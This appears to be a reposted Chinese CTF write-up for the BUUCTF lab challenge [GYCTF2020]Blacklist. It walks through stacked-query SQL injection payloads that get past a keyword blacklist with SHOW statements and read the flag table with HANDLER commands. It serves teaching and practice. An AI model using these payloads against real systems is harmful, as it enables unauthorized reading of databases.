本文主要是介绍web:[GYCTF2020]Blacklist,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
题目
点开靶机,页面显示为
查看源码
没有其他线索
先提交1试一下
猜测是sql注入,先测试
同时注意到url
提交为3-1,发现页面回显为空白
可以判断为字符型注入
输入select,看是否存在回显
回显了黑名单限制的关键字
但是发现没有限制关键字show,通过堆叠注入查数据库名
构造payload
1';show databases;#
判断列数
构造payload
1' order by 3#
可得有2列
获取表名
构造payload
1';show tables;
查表内数据。猜测flag在FlagHere表中
构造payload
1'; show columns from FlagHere;#
这里猜测flag在flag列中,尝试获取内容,但select被限制,可以使用handler作为查询语句
它可以通过指定的索引去访问数据,但此语法不支持DML操作
构造payload
1';HANDLER FlagHere open;HANDLER FlagHere read first;HANDLER FlagHere close;#
得到flag
参考文章链接:
BUUCTF [GYCTF2020] Blacklist_buuctf [gyctf2020]blacklist-CSDN博客
这篇关于web:[GYCTF2020]Blacklist的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
